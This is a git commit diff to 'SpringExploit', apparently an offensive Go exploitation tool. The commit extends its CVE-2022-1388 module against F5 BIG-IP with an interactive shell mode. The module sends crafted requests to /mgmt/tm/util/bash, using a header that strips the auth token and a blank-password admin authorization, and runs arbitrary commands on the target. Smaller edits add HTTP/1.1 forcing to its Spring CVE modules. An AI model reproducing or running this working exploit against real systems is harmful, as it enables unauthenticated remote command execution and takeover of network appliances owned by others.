CVE-2022-1388漏洞支持交互shell执行命令

SummerSec · SummerSec · commit 7615e7894ed6 · 2022-05-10T15:44:51.000+08:00
diff --git a/README.md b/README.md
@@ -13,7 +13,7 @@
 	<a xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://visitor-badge.laobi.icu"><rect fill="rgba(0,0,0,0)" height="20" width="17.0" x="49.6"/></a>
 	</p>
 
-  
+
 
 ## 📝 TODO
 
@@ -25,7 +25,9 @@
 * [x] 自定义输出日志位置
 * [x] 自定义结果输出位置
 * [x] 支持自定义漏洞利用
-* [x] 支持指定ip段ex: 192.168.0.0/24
+* [x] 支持指定ip段eg: 192.168.0.0/24
+* [ ] 命令执行漏洞式支持交互式执行命令
+* [ ] 验证url是否存活
 
 ………
 
diff --git a/cmd/commons/attack/Pocslist.go b/cmd/commons/attack/Pocslist.go
@@ -3,18 +3,26 @@ package attack
 import "container/list"
 
 const (
+	// 2022年list
 	CVE202222963 string = "CVE202222963"
 	CVE202222965 string = "CVE202222965"
 	CVE202222947 string = "CVE202222947"
+	CVE20221388  string = "CVE20221388"
 
+	// 2021年list
 	CVE202126084 string = "CVE202126084"
 )
 
 func GetList() *list.List {
 	l := list.New()
+
+	// 2022年漏洞
 	l.PushBack(CVE202222963)
 	l.PushBack(CVE202222965)
 	l.PushBack(CVE202222947)
+	l.PushBack(CVE20221388)
+
+	// 2021年漏洞
 	l.PushBack(CVE202126084)
 
 	return l
diff --git a/cmd/commons/core/options.go b/cmd/commons/core/options.go
@@ -41,6 +41,11 @@ type Options struct {
 	IP string
 	// show pocs list
 	SP bool
+
+	// 是否进入交互shell
+	Shell bool
+	// 强制开启HTTP 1.1
+	H1 bool
 }
 
 func (o Options) toString() interface{} {
@@ -65,10 +70,12 @@ func ParseOptions() *Options {
 	flag.StringVar(&options.Out, "o", "result.txt", "out file example: -o=result.txt default result.txt")
 	flag.StringVar(&options.Pocs, "p", "", "pocs example: -p=CVE202222947,CVE202122963,poc3")
 	flag.StringVar(&options.IP, "i", "", "ip segment example: -i=192.168.1.1/32")
+	flag.BoolVar(&options.Shell, "shell", false, "whether to enter the interactive shell")
+	flag.BoolVar(&options.H1, "h1", false, "force to use HTTP 1.1")
 	flag.Parse()
 
 	// TODO 修改版本号
-	v := "0.0.7"
+	v := "0.0.8"
 
 	ShowBanner(v)
 
diff --git a/cmd/commons/poc/2022/CVE-2022-1388.go b/cmd/commons/poc/2022/CVE-2022-1388.go
@@ -5,7 +5,7 @@ import (
 	"encoding/json"
 	req2 "github.com/SummerSec/SpringExploit/cmd/commons/req"
 	"github.com/SummerSec/SpringExploit/cmd/commons/utils"
-	"github.com/fatih/structs"
+	"github.com/c-bata/go-prompt"
 	"github.com/imroc/req/v3"
 	log "github.com/sirupsen/logrus"
 	"net/url"
@@ -17,25 +17,24 @@ type CVE20221388 struct{}
 func (t CVE20221388) SendPoc(target string, hashmap map[string]interface{}) {
 	log.Debug("[+] Start CVE-2022-1388")
 
-	reqinfo := req2.NewReqInfo()
-	reqmap := structs.Map(reqinfo)
+	//reqinfo := req2.NewReqInfo()
+	//reqmap := structs.Map(reqinfo)
+	reqmap := req2.NewReqInfoToMap(hashmap)
 
 	// 初始化请求
 	// TODO 可以设置超时时间 重复次数 代理等 下面默认使用默认值
-	reqmap["timeout"] = hashmap["Timeout"].(int)
-	reqmap["retry"] = hashmap["Retry"].(int)
-	reqmap["proxy"] = hashmap["Proxy"].(string)
-	reqmap["mode"] = hashmap["Mode"].(int)
+	reqmap["h1"] = true
 
 	u, _ := url.Parse(target)
 	path := "/mgmt/tm/util/bash"
 	reqmap["url"] = u.Scheme + "://" + u.Host + path
 	reqmap["method"] = "POST"
 
 	headers := map[string]string{
-		"Host":            "localhost",
-		"User-Agent":      utils.GetUA(),
-		"Connection":      "keep-alive,x-f5-auTh-tOKen",
+		"Host":       "localhost",
+		"User-Agent": utils.GetUA(),
+		//"Connection":      "keep-alive, x-f5-auTh-tOKen, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd,X-F5-New-Authtok-Reqd,X-Forwarded-Server,X-Forwarded-Host",
+		"Connection":      "keep-alive, x-f5-auTh-tOKen",
 		"Authorization":   "Basic YWRtaW46",
 		"X-F5-Auth-Token": utils.GetCode(5),
 		"Content-Type":    "application/json",
@@ -55,13 +54,35 @@ func (t CVE20221388) SendPoc(target string, hashmap map[string]interface{}) {
 
 	if t.CheckExp(resp, randstr, hashmap) {
 		t.SaveResult(target, hashmap["Out"].(string))
+	}
+
+	if hashmap["Shell"].(bool) {
+		log.Info("[+] Start CVE-2022-1388 shell")
+		th := prompt.Input("[+] Please input command: ", completer)
+		if th == "" {
+			th = "whoami |base64 "
+		} else {
+			th = th + " |base64 "
+		}
+		reqmap["body"] = "{\"command\":\"run\",\"utilCmdArgs\":\"-c '" + th + "'\"}"
+		resp = utils.Send(reqmap)
+		txt := resp.String()
 
+		log.Debugf("[+] resp: %s", txt)
+		var txtmap map[string]interface{}
+		err := json.Unmarshal([]byte(txt), &txtmap)
+		if err != nil {
+			log.Errorf("[-] Unmarshal error: %s", err)
+			return
+		}
+		log.Info("命令执行结果: " + utils.DecodeString(txtmap["commandResult"].(string)))
+		log.Info("[+] End CVE-2022-1388 shell")
 	}
 
 }
 
 func (CVE20221388) SaveResult(target string, file string) {
-	result := target + " 存在 CVE-2022-1388漏洞"
+	result := target + " 存在 CVE-2022-1388漏洞 可以使用 SpringExplit -u " + target + " -p CVE20221388 --shell 进入交互shell执行命令"
 	err := utils.SaveToFile(result, file)
 	log.Info(result)
 	if err != nil {
@@ -71,7 +92,15 @@ func (CVE20221388) SaveResult(target string, file string) {
 }
 
 func (CVE20221388) CheckExp(resp *req.Response, randstr string, hashmap map[string]interface{}) bool {
+	defer func() {
+		if err := recover(); err != nil {
+			log.Error("[-] CheckExp error: ", err)
+		}
+	}()
 	res := resp.String()
+	if res == "" {
+		return false
+	}
 	log.Debugf(res)
 	if strings.Contains(res, randstr) {
 		// 将res 转化成map
@@ -85,4 +114,12 @@ func (CVE20221388) CheckExp(resp *req.Response, randstr string, hashmap map[stri
 		return true
 	}
 	return false
+	return false
+}
+
+func completer(d prompt.Document) []prompt.Suggest {
+	s := []prompt.Suggest{
+		{Text: "id", Description: "you can type command {id}"},
+	}
+	return prompt.FilterHasPrefix(s, d.GetWordBeforeCursor(), true)
 }
diff --git a/cmd/commons/poc/2022/CVE-2022-22947.go b/cmd/commons/poc/2022/CVE-2022-22947.go
@@ -61,6 +61,8 @@ func (p CVE202222947) SendPoc(target string, hashmap map[string]interface{}) {
 	reqmap["retry"] = hashmap["Retry"].(int)
 	reqmap["proxy"] = hashmap["Proxy"].(string)
 	reqmap["mode"] = hashmap["Mode"].(int)
+	reqmap["h1"] = hashmap["H1"].(bool)
+
 	f := 0
 	for true {
 		// 第一次请求
diff --git a/cmd/commons/poc/2022/CVE-2022-22963.go b/cmd/commons/poc/2022/CVE-2022-22963.go
@@ -33,6 +33,7 @@ func (p CVE202222963) SendPoc(target string, hashmap map[string]interface{}) {
 	reqmap["retry"] = hashmap["Retry"].(int)
 	reqmap["proxy"] = hashmap["Proxy"].(string)
 	reqmap["mode"] = hashmap["Mode"].(int)
+	reqmap["h1"] = hashmap["H1"].(bool)
 	reqmap["headers"] = map[string]string{
 		"User-Agent":   utils.GetUA(),
 		"Content-Type": "application/x-www-form-urlencoded",
diff --git a/cmd/commons/poc/2022/CVE-2022-22965.go b/cmd/commons/poc/2022/CVE-2022-22965.go
@@ -57,6 +57,7 @@ func (p CVE202222965) SendPoc(target string, hashmap map[string]interface{}) {
 	reqmap["retry"] = hashmap["Retry"].(int)
 	reqmap["proxy"] = hashmap["Proxy"].(string)
 	reqmap["mode"] = hashmap["Mode"].(int)
+	reqmap["h1"] = hashmap["H1"].(bool)
 	f := 0
 	for f < 2 {
 		time.Sleep(time.Second * 1)
diff --git a/cmd/commons/poc/demo.go b/cmd/commons/poc/demo.go
@@ -3,7 +3,7 @@ package poc
 import (
 	req2 "github.com/SummerSec/SpringExploit/cmd/commons/req"
 	"github.com/SummerSec/SpringExploit/cmd/commons/utils"
-	"github.com/fatih/structs"
+	"github.com/c-bata/go-prompt"
 	"github.com/imroc/req/v3"
 	log "github.com/sirupsen/logrus"
 )
@@ -13,8 +13,9 @@ type Demo struct{}
 func (d Demo) SendPoc(target string, hashmap map[string]interface{}) {
 
 	log.Debugf("[+] Running default poc")
-	reqinfo := req2.NewReqInfo()
-	reqmap := structs.Map(reqinfo)
+	//reqinfo := req2.NewReqInfo()
+	//reqmap := structs.Map(reqinfo)
+	reqmap := req2.NewReqInfoToMap(hashmap)
 	// TODO 每次传入的url 都是标准的 http(s)://host:port/path
 	// 可以使用 url.Parse 来解析获取 host 和 port
 	// for example:
@@ -38,10 +39,11 @@ func (d Demo) SendPoc(target string, hashmap map[string]interface{}) {
 	reqmap["body"] = ""
 
 	// TODO 可以设置超时时间 重复次数 代理等 下面默认使用默认值
-	reqmap["timeout"] = hashmap["Timeout"].(int)
-	reqmap["retry"] = hashmap["Retry"].(int)
-	reqmap["proxy"] = hashmap["Proxy"].(string)
-	reqmap["mode"] = hashmap["Mode"].(int)
+	//reqmap["timeout"] = hashmap["Timeout"].(int)
+	//reqmap["retry"] = hashmap["Retry"].(int)
+	//reqmap["proxy"] = hashmap["Proxy"].(string)
+	//reqmap["mode"] = hashmap["Mode"].(int)
+	//reqmap["h1"] = hashmap["H1"].(bool)
 	// 发送请求， 获取响应 resp := utils.Send(reqmap)
 
 	resp := utils.Send(reqmap)
@@ -72,3 +74,10 @@ func (d Demo) CheckExp(resp *req.Response, target string, hashmap map[string]int
 	log.Debugf("[+] check exp")
 	return false
 }
+
+func completer(d prompt.Document) []prompt.Suggest {
+	s := []prompt.Suggest{
+		{Text: "id", Description: "you can type command {id}"},
+	}
+	return prompt.FilterHasPrefix(s, d.GetWordBeforeCursor(), true)
+}
diff --git a/cmd/commons/req/request.go b/cmd/commons/req/request.go
@@ -1,5 +1,7 @@
 package req
 
+import "github.com/fatih/structs"
+
 type ReqInfo struct {
 	Method  string
 	Url     string
@@ -9,6 +11,7 @@ type ReqInfo struct {
 	Timeout string
 	Retry   string
 	Mode    string
+	H1      bool
 }
 
 //func (r *ReqInfo) Method() string {
@@ -97,9 +100,32 @@ func NewReqInfo() ReqInfo {
 		Body:    "",
 		Header:  make(map[string]string),
 		Proxy:   "",
-		Timeout: "",
-		Retry:   "",
-		Mode:    "",
+		Timeout: "10",
+		Retry:   "3",
+		Mode:    "0",
+		H1:      false,
 	}
 	return reqInfo
 }
+
+func NewReqInfoToMap(hashmap map[string]interface{}) map[string]interface{} {
+	reqInfo := ReqInfo{
+		Method:  "",
+		Url:     "",
+		Body:    "",
+		Header:  make(map[string]string),
+		Proxy:   "",
+		Timeout: "10",
+		Retry:   "3",
+		Mode:    "0",
+		H1:      false,
+	}
+	reqmap := structs.Map(reqInfo)
+	reqmap["timeout"] = hashmap["Timeout"].(int)
+	reqmap["retry"] = hashmap["Retry"].(int)
+	reqmap["mode"] = hashmap["Mode"].(int)
+	reqmap["h1"] = hashmap["H1"].(bool)
+	reqmap["proxy"] = hashmap["Proxy"].(string)
+
+	return reqmap
+}
diff --git a/cmd/commons/utils/httpclient.go b/cmd/commons/utils/httpclient.go
@@ -6,12 +6,19 @@ import (
 	"time"
 )
 
-func InIt(mode int, timeout int, proxy string, retry int) (client *req.Client) {
+func InIt(mode int, timeout int, proxy string, retry int, h1 bool) (client *req.Client) {
 	log.Debugf("init httpclient")
 	client = req.NewClient()
 	if mode != 0 {
 		client.EnableDumpAll().EnableDebugLog()
 	}
+
+	// TODO client.DisableAutoReadResponse() 不能开启DisableAutoReadResponse 不然CVE-2022-1388 漏洞无法验证
+	if h1 {
+		// TODO 强制开启 EnableForceHTTP1 CVE-2022-1388 漏洞设置http代理的情况下必须强制开启HTTP1 其他情况框架会自动判断使用什么版本http协议
+		client.EnableForceHTTP1()
+	}
+
 	client.SetLogger(log.StandardLogger())
 	// 设置超时时间
 	client.SetTimeout(time.Duration(timeout) * time.Second)
@@ -41,8 +48,9 @@ func Send(hashmap map[string]interface{}) (resp *req.Response) {
 	mode := hashmap["mode"].(int)
 	headers := hashmap["headers"].(map[string]string)
 	body := hashmap["body"]
+	h1 := hashmap["h1"].(bool)
 
-	client := InIt(mode, timeout, proxy, retry)
+	client := InIt(mode, timeout, proxy, retry, h1)
 
 	reqt := client.R().EnableDump()
 	reqs := SetRequest(reqt, headers, body.(string))
diff --git a/cmd/test/copymap.go b/cmd/test/copymap.go
@@ -0,0 +1,5 @@
+package main
+
+func main() {
+
+}
diff --git a/cmd/test/prompt.go b/cmd/test/prompt.go
@@ -0,0 +1,19 @@
+package main
+
+import (
+	"github.com/c-bata/go-prompt"
+	log "github.com/sirupsen/logrus"
+)
+
+func completer(d prompt.Document) []prompt.Suggest {
+	s := []prompt.Suggest{
+		{Text: "id", Description: "you can type command {id}"},
+	}
+	return prompt.FilterHasPrefix(s, d.GetWordBeforeCursor(), true)
+}
+
+func main() {
+	log.Info("Starting prompt")
+	t := prompt.Input("> ", completer)
+	log.Info("you type: ", t)
+}
diff --git a/go.mod b/go.mod
@@ -13,6 +13,7 @@ require (
 )
 
 require (
+	github.com/c-bata/go-prompt v0.2.6 // indirect
 	github.com/hashicorp/errwrap v1.0.0 // indirect
 	github.com/hashicorp/go-multierror v1.1.1 // indirect
 	github.com/projectdiscovery/blackrock v0.0.0-20210415162320-b38689ae3a2e // indirect
diff --git a/go.sum b/go.sum
